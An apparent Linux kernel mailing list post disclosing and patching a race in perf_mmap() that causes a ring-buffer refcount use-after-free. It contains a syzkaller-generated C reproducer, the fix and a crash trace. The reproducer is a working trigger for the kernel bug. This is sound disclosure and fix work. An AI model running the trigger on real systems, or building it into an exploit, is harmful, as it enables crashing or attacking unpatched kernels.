Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. 
On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0
{ "author": "Haocheng Yu <yuhaocheng035@gmail.com>", "date": "Sun, 1 Feb 2026 19:34:36 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello,

I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.

Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap() function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in perf_mmap() in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range()) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5.

Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)

Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning. The full report is below:

audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] 
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 